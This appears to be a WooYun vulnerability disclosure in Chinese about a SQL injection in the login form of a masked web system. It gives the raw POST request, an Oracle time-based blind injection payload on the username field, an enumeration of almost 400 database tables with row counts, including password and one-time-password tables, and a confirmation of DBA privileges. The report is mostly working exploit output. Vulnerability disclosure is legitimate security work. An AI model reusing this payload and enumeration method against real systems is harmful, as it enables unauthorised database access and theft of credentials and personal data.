WooYun.org

1,注入点

POST **.**.**.**:8082/jsicpa/common/login.do?method=login HTTP/1.1
Host: **.**.**.**:8082
Connection: keep-alive
Content-Length: 67
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: **.**.**.**:8082
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.125 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: **.**.**.**:8082/jsicpa/common/login.do
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: userType=0; JSESSIONID=CDE420317E68414DCE2BB770F811AB7B
userType=0&AS_usr=admin*&AS_psw=admin&userScreen=1366&AS_dynamicPwd=

2,注入信息
Parameter: #1* ((custom) POST)
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: userType=0&AS_usr=admin' AND 6888=DBMS_PIPE.RECEIVE_MESSAGE(CHR(104)||CHR(68)||CHR(120)||CHR(105),5) AND 'XQqJ'='XQqJ&AS_psw=admin&userScreen=1366&AS_dynamicPwd=
---
back-end DBMS: Oracle
available databases [1]:
[*] JSICPA
3,表------300多张
back-end DBMS: Oracle
Database: JSICPA
[396 tables]
+-------------------------------------------------------+
| BB_CONTENT\X07\\?A6C |
| BB_SDSHUQJBI\X1BA\X19\X05!9+\X05\X04J\X03SBAQ\X06CE!A |
| BI_TYPE9212\X11 |
| B_DITPATCHOID\X03\X0B\X08G |
| B_NEW_DISPITCH! |
| B_NOTICE\T& |
| B_READKRA\X05 |
| B_RECEIVE_12::AA |
| B_REJIER_P]09\X03\X05 |
| B_ROLLPUBLICITY\X02 |
| B_TOPIC\X03 |
| CPA168\T |
| D_FURNITURE\X03 |
| EMP_MSG\X11 |
| JBPM4_PARTICIPATION\T |
| K_CITYT]ANSPORT\X07K |
| K_COMP\X7FNY0912 |
| K_EVALAUTEYAAR\X05 |
| K_EXEMPTION! |
| K_MICFONOWORK! |
| K_MICFONO\X15\T\X11 |
| K_MICFOREGISTER\X03 |
| K_ORDER! |
| K_PARTYBRANCH! |
| K_PARTYNO\X05 |
| K_PBA!A!B |
| K_PENU\X03 |
| K_QCAAUDIT\X03\X02 |
| K_QOMPANYI20:41105 |
| K_ROLE\X02 |
| K_SURVEYTYPEDETAIL\X03 |
| K_USERROLEMENU\X15K\X05 |
| K_WEC_FLOW\X1D |
| K_WORKER}OST |
| K_YCKAREA\X11 |
| NIANJJAN\T |
| P_ANSWER\X11 |
| P_CASESTYPE\T\T\X05\T |
| P_CASES_CHECK\X11\X02\X03 |
| P_PP\\?81ICYI\X12\X03\X02\X04!A\T |
| S_APPROVAL\X11 |
| S_QRYCOND~TION |
| TBDBSYNTASK\X04 |
| WORKTINE\X04 |
| XSHPPPLYHOLDSULFHOVRI\X134\X17 |
| XS_HPPLYTRAINHOUY!\T\TQ\T |
| XS_PSBA\X1FE1 |
| Z_QUESTION\X15 |
| BASEINFO |
| BBCOMPANYFYQRY |
| BB_APPLY |
| BB_BBQTB |
| BB_CCSSSQKCJJB |
| BB_CHARGESTANDARD |
| BB_COMPANYLIVT |
| BB_COMPANYREPORTCOUNT |
| BB_CONTENT1 |
| BB_CONTENT120140514 |
| BB_CONTENT1_20150129 |
| BB_DXZHPGB |
| BB_FLSJB |
| BB_HBSJB |
| BB_HOUR |
| BB_INFOCHANGE |
| BB_JRZCPGB |
| BB_KJDSHB |
| BB_KJZSB |
| BB_KTSSJJB |
| BB_OTHERB |
| BB_QCHZB |
| BB_QSSHB |
| BB_QTZCPGB |
| BB_QYJZPGB |
| BB_SFKJJDB |
| BB_SJB |
| BB_SJMONEY |
| BB_SWDLB |
| BB_TEPI |
| BB_WHNJB |
| BB_YZB |
| BB_ZCPGB |
| BB_ZXSJB |
| B_ATTENDANCE |
| B_ATTENDSET |
| B_ATTENDTIME |
| B_BILL |
| B_BILL_DETAIL |
| B_BOOKORDER |
| B_CHECKERRESULT |
| B_CHECKGROUPRESULT |
| B_CITYFILE |
| B_DISPATCH |
| B_DISPATCHZJQ |
| B_DOCUMINTS1 |
| B_ENROLL |
| B_FILE |
| B_FILEAPPLY |
| B_FILELIST |
| B_FILESHARE |
| B_FILESHAREDETAIL |
| B_FINANCEFLOW |
| B_FLOWMGR |
| B_FLOWWORDINFO |
| B_INFORM |
| B_MAINTENANCEBOOK |
| B_MATERIAL |
| B_NEW |
| B_PAPER |
| B_PASTA |
| B_PUBLICITY |
| B_READER_0910_CHM |
| B_RECEJVE |
| B_SCORE |
| B_SCOREITYM |
| B_SYSTEMFILE |
| B_TEACHERA |
| B_TRAINING |
| B_TRAININGHOLDSALF |
| D_ASSETS |
| D_ASSETSDISCOUNT |
| D_ASSETSREPAIR |
| D_ASSETSTYPI |
| D_CAR |
| D_CQUIPMENT |
| F_FLOWNODETMP |
| F_FLOW_MESSAGE |
| F_FLOW_STEP |
| F_FLOW_TASK |
| F_MODEL_FLOW_AMONGNODE |
| F_MODEL_FLOW_MAIN |
| F_MODEL_FLOW_MAIN_TMP |
| F_MODEL_FLOW_NODE |
| JBPM4_COMMENT |
| JBPM4_DEPLOYMENT |
| JBPM4_DEPLOYPROPA |
| JBPM4_EXECUTION |
| JBPM4_HIST_ACTINST |
| JBPM4_HIST_DETAIL |
| JBPM4_HIST_PROCINST |
| JBPM4_HIST_TASK |
| JBPM4_HIST_VAR |
| JBPM4_ID_GROUP |
| JBPM4_ID_MEMBERSHIP |
| JBPM4_ID_USEA |
| JBPM4_JOBE |
| JBPM4_LOB |
| JBPM4_PARPERTY |
| JBPM4_SWIMQANE |
| JBPM4_TASK |
| JBPM4_VARIABLE |
| K_ACTJVITIES |
| K_AGWHEXCEPECT |
| K_APPLYBILL |
| K_AREA |
| K_ASSESSER |
| K_ATTICHFILE |
| K_AUDITBQLL |
| K_AUDITQCACPA |
| K_AUTOCODEA |
| K_AWARDA |
| K_AWARDTO |
| K_BILL_TEMP |
| K_CANCEL |
| K_CANDIDATES |
| K_CARD |
| K_CARTIFICATE |
| K_CICPA |
| K_CMPLOYEE |
| K_CNTAGENAY |
| K_CNTDEPART |
| K_CNTLINK |
| K_CNTMEMBER |
| K_CNTTYPE |
| K_COMPANY |
| K_COMPANY113834788 |
| K_COMPANY140109 |
| K_COMPANYNEWS |
| K_COMPANY_1209 |
| K_COMPANY_BACK |
| K_COMPANY_DEL1209 |
| K_COMPAY_IMP |
| K_CONFERENCERECORD |
| K_COSTPAY |
| K_COSTPAY_DETAIL |
| K_CPAPAYMENT |
| K_CUSTOMER |
| K_CUSTOMER_TFP |
| K_DEPARTMENT |
| K_DEPARTMENTSCHEDULE |
| K_DIC |
| K_DIC_BAK |
| K_DIRECTOR |
| K_DOCIMAGE2 |
| K_DOCIAAGE |
| K_DOGEXCEPECT |
| K_DOGEXCEPECT_20150202 |
| K_DOWNLOAIINFO |
| K_DXAM |
| K_EMPLOYEE_20140327 |
| K_EVALAUTOOPERA |
| K_EVALCHECK |
| K_EVALCOMPANY |
| K_EVALCOMPANY20140519 |
| K_EVALCOMPANY20140521 |
| K_EVALERROR |
| K_EVALRESULT |
| K_EVALRESULT0514 |
| K_EVALRESULT20140519 |
| K_EVALRESULT20140521 |
| K_EVALTEMP |
| K_EXAMINATIONENTRY |
| K_EXAMRESULTS |
| K_EXAM_DETAIL |
| K_GOURCOSTMAIN |
| K_GOVERNMENT |
| K_GRADE |
| K_GUDONG |
| K_GUDONG_20140327 |
| K_HOUACOSTMANAGE |
| K_INTEGAITY |
| K_LINK |
| K_LONGTEXT |
| K_MEMBER |
| K_MEMBERBRANCH |
| K_MEMBERPOST |
| K_MEMBERSHIPFEE |
| K_MENBERCPSTPAY |
| K_MESSAGEINFO |
| K_MICCOUNT |
| K_MICFO |
| K_MICFO1223 |
| K_MICFO130109 |
| K_MICFO172408947 |
| K_MICFO20151121 |
| K_MICFO20151221 |
| K_MICFOCT |
| K_MICFONO140843784 |
| K_MICFONO143324801 |
| K_MICFONO144232393 |
| K_MICFONO150641286 |
| K_MICFONO150806090 |
| K_MICFONO150927152 |
| K_MICFONO151559355 |
| K_MICFONO151918031 |
| K_MICFONO152130326 |
| K_MICFONO152320202 |
| K_MICFONO152519380 |
| K_MICFONO152809971 |
| K_MICFONO153014317 |
| K_MICFONOEDU |
| K_MICFONOJOINPARTY |
| K_MICFONO_BACKUP |
| K_MICFONO_TEMP |
| K_MICFO_1209 |
| K_MICFO_BACKUP |
| K_MICFO_DEL1209 |
| K_MICFO_IMP |
| K_MIGE |
| K_MIAFONO149347105AQ |
| K_MONREPORTCOLLECT |
| K_MONTHLYREPORT |
| K_NONTHLYCONTROL |
| K_OA_AUTOCODE |
| K_OFFICEINFOCHANGE |
| K_OFFICERECORD |
| K_OLDCANDIDATES |
| K_OLDCIRTIFICATE |
| K_OTP |
| K_PAPER |
| K_PAPER_DETAIL |
| K_PARTY |
| K_PARTYACTIVITIES |
| K_PARTYCOMMEND |
| K_PARTYDOC |
| K_PARTYEXPANSIAN |
| K_PARTYPOST |
| K_PARTYSYSTEM |
| K_PARTYTRAINING |
| K_PATTYADMIN |
| K_PAYPARAMETTER |
| K_PERSONINFOEHANGB |
| K_POSITION |
| K_QCACPA |
| K_QCACPA20151026 |
| K_QUESTIONBANK |
| K_QUESTIONRESULT |
| K_QUESTIONRESULT_20140327 |
| K_QUESTIONTEMPLATE |
| K_QUESTIONTEMPLATE_OLD |
| K_REPLY |
| K_REPORTVALIDATE |
| K_RESULTTYPE |
| K_ROLE_BB |
| K_SASK |
| K_SCORE |
| K_SMS |
| K_SMS_TASK |
| K_STAFF |
| K_SUPAPPEAL |
| K_SUPCASE |
| K_SUPDEFENSE |
| K_SUPERVISECOMPANY |
| K_SUPERVISEMAIN |
| K_SUPERVISERESULT |
| K_SUPERVISESUB |
| K_SUPERVISEUSER |
| K_SUPERVISION |
| K_SUPMEETING |
| K_SUPPROGRESS |
| K_SUPPUNISH |
| K_SUPQRY |
| K_SUPRESULTTRACK |
| K_SUPSUMMARY |
| K_SUPTASK |
| K_SUPVIEW |
| K_SURVEY |
| K_SURVEYDETAIL |
| K_SURVEYITEM |
| K_SURVEYITEMANSWER |
| K_SURVEYITEMDETAIL |
| K_SURVEYTYPE |
| K_TALENTS |
| K_TALENTS_20140327 |
| K_TEMPMICFONO0630 |
| K_TEMPSENDUSER |
| K_TESTERCOMPOSITION |
| K_TESTERNOTICE |
| K_TESTRESULT |
| K_TICKET |
| K_TICKETRESULT |
| K_TRADEPRIZE |
| K_TRADEPRIZERECORD |
| K_TRAINRECORD |
| K_UCAPWD |
| K_USERROLE |
| K_VERIFICATION |
| K_VERNMENT |
| K_VIOLATION |
| K_WAGEMANAGE |
| K_WEB_FLOW_STEP |
| K_WOMEN |
| K_WOMENBRANCH |
| K_WOMENPOST |
| K_WORKER |
| K_WORKERBRANCH |
| K_WORKINGSTATUS |
| K_YCKCOMPANY |
| K_YCKCPA |
| K_YCKCPANO |
| K_YCKCPANO_TEMP0921 |
| K_YCKCPA_BAK |
| K_YCKPWD |
| K_YCKQRCODE |
| K_YEARCHECKMANAGENO |
| K_YEARCHECKMANAGE |
| K_QICFOAO153112047 |
| L_BBLOG |
| L_LOG |
| PUNISHYEAR |
| P_CASES |
| P_POLICY_CHEIK |
| P_PPLICYTYPEA |
| P_QUEATION |
| P_TEMPLATE |
| P_TEMPLATEASK |
| QB_KJZXHFWFWA |
| SUEERVISION |
| SYSAUTOSQL |
| SYS_QRYINFO |
| S_AUTOHINTSELECT |
| S_AUTOHINTSELECT_BACKUP |
| S_CONFIG |
| S_INDEXOGR |
| S_LINEUP |
| S_MEANING |
| S_OTPINFO |
| S_TARGET |
| T1 |
| TALENTS |
| T_INSPECTION |
| T_QNSPECTIONNO |
| T_QQ |
| WORKING |
| XS_CONTENT |
| XS_CONTENT0831 |
| XS_CONTENT0831BAK |
| XS_CONTENTGXEMPTIUN |
| XS_GATHER |
| XS_TYPE |
| YEQRCMECKMANAGE |
| Z_K_QUESTIONTEMPLATE0606 |
| Z_K_QUEWXIONTEMPLATE0605 |
| Z_QUESTIONRESULT |
| Z_READER |
| Z_SHAREHOLDER |
| Z_SHAREHOLDERAD |
+-------------------------------------------------------+
Database: JSICPA
+---------------------------+---------+
| Table | Entries |
+---------------------------+---------+
| L_LOG | 432248 |
| BB_CONTENT1 | 318694 |
| BB_CONTENT1_20150129 | 173971 |
| BB_SJB | 137050 |
| BB_ZXSJB | 114812 |
| K_QUESTIONRESULT_20140327 | 91813 |
| K_QUESTIONRESULT | 73573 |
| BB_CONTENT120140514 | 70347 |
| Z_QUESTIONRESULT | 65304 |
| BB_YZB | 55710 |
| K_EVALRESULT0514 | 44322 |
| K_EVALRESULT20140519 | 44233 |
| K_EVALRESULT20140521 | 43966 |
| K_EVALRESULT | 43699 |
| Z_READER | 29846 |
| F_FLOW_MESSAGE | 22269 |
| K_YCKPWD | 16895 |
| K_EMPLOYEE_20140327 | 12541 |
| K_MONTHLYREPORT | 12084 |
| K_YCKCPA | 9844 |
| K_MICFONOEDU | 9374 |
| L_BBLOG | 8195 |
| BB_INFOCHANGE | 7563 |
| XS_CONTENT | 7315 |
| XS_CONTENT0831 | 7315 |
| K_MEMBERSHIPFEE | 7248 |
| K_MICFONO_TEMP | 7059 |
| K_MICFONO_BACKUP | 7053 |
| K_YCKCPANO | 6972 |
| XS_CONTENT0831BAK | 6538 |
| K_MICFO | 5846 |
| K_MICFO20151221 | 5769 |
| K_MICFO20151121 | 5713 |
| K_TALENTS | 5085 |
| K_MICFO1223 | 4861 |
| K_MICFO130109 | 4861 |
| K_MICFO_IMP | 4852 |
| K_MICFO_1209 | 4851 |
| K_MICFO_BACKUP | 4849 |
| BB_OTHERB | 4570 |
| K_GUDONG | 4238 |
| F_FLOW_STEP | 4114 |
| K_MICFONO140843784 | 3373 |
| K_TALENTS_20140327 | 2489 |
| F_MODEL_FLOW_NODE | 2281 |
| B_READER_0910_CHM | 2200 |
| K_GUDONG_20140327 | 2126 |
| F_MODEL_FLOW_AMONGNODE | 1912 |
| K_EVALERROR | 1657 |
| K_TEMPMICFONO0630 | 984 |
| K_YCKCOMPANY | 942 |
| K_MICFONO143324801 | 829 |
| K_MICFONO144232393 | 829 |
| S_OTPINFO | 804 |
| K_MICFONO150641286 | 773 |
| K_MICFONO150806090 | 773 |
| K_MICFONO150927152 | 773 |
| B_FILELIST | 772 |
| K_USERROLE | 759 |
| K_SUPPUNISH | 751 |
| K_OFFICERECORD | 733 |
| K_DOGEXCEPECT_20150202 | 662 |
| K_COMPANY | 538 |
| K_COMPANY_1209 | 516 |
| K_COMPANY_BACK | 514 |
| K_COMPANY140109 | 511 |
| K_COMPAY_IMP | 509 |
| K_ROLE_BB | 505 |
| K_EVALCOMPANY20140519 | 497 |
| K_EVALCOMPANY20140521 | 494 |
| K_EVALCOMPANY | 491 |
| K_DIC | 465 |
| K_CANCEL | 458 |
| K_MICFONO151559355 | 426 |
| F_MODEL_FLOW_MAIN | 369 |
| K_DIC_BAK | 337 |
| B_DISPATCH | 282 |
| BASEINFO | 270 |
| S_MEANING | 226 |
| K_MICFO_DEL1209 | 225 |
| F_MODEL_FLOW_MAIN_TMP | 221 |
| JBPM4_DEPLOYMENT | 180 |
| JBPM4_LOB | 180 |
| K_MONREPORTCOLLECT | 176 |
| B_ATTENDANCE | 139 |
| K_APPLYBILL | 129 |
| K_QUESTIONTEMPLATE | 121 |
| Z_K_QUESTIONTEMPLATE0606 | 121 |
| K_QUESTIONTEMPLATE_OLD | 120 |
| K_MICFONO152130326 | 106 |
| K_QCACPA | 99 |
| K_AUDITQCACPA | 98 |
| B_ATTENDSET | 90 |
| K_EVALTEMP | 89 |
| B_FLOWMGR | 88 |
| K_CONFERENCERECORD | 81 |
| K_CICPA | 68 |
| K_QCACPA20151026 | 68 |
| S_AUTOHINTSELECT | 61 |
| K_EVALAUTOOPERA | 60 |
| B_FLOWWORDINFO | 59 |
| T_QQ | 59 |
| Z_SHAREHOLDERAD | 59 |
| K_MICFONO152320202 | 57 |
| K_YCKCPANO_TEMP0921 | 54 |
| B_FILE | 53 |
| K_OTP | 53 |
| S_AUTOHINTSELECT_BACKUP | 42 |
| SYS_QRYINFO | 32 |
| K_DEPARTMENT | 24 |
| K_CNTMEMBER | 20 |
| K_DOCIMAGE2 | 20 |
| K_MICFONO152519380 | 18 |
| K_CUSTOMER | 16 |
| K_COMPANY_DEL1209 | 15 |
| K_AREA | 14 |
| TALENTS | 13 |
| K_MICFONO152809971 | 10 |
| BB_APPLY | 9 |
| K_CNTDEPART | 8 |
| K_SUPTASK | 7 |
| B_CITYFILE | 6 |
| T_INSPECTION | 6 |
| B_DISPATCHZJQ | 5 |
| K_EVALCHECK | 5 |
| K_SMS_TASK | 5 |
| K_MICFONO153014317 | 4 |
| K_SUPVIEW | 4 |
| K_SURVEYITEMDETAIL | 4 |
| B_ATTENDTIME | 3 |
| B_FILEAPPLY | 2 |
| K_AWARDTO | 2 |
| SYSAUTOSQL | 2 |
| BB_SFKJJDB | 1 |
| BB_WHNJB | 1 |
| K_MICFOCT | 1 |
| K_OA_AUTOCODE | 1 |
| K_YCKQRCODE | 1 |
| K_YEARCHECKMANAGE | 1 |
| K_YEARCHECKMANAGENO | 1 |
| S_CONFIG | 1 |
| Z_SHAREHOLDER | 1 |
+---------------------------+---------+
4,DBA权限
current user is DBA: True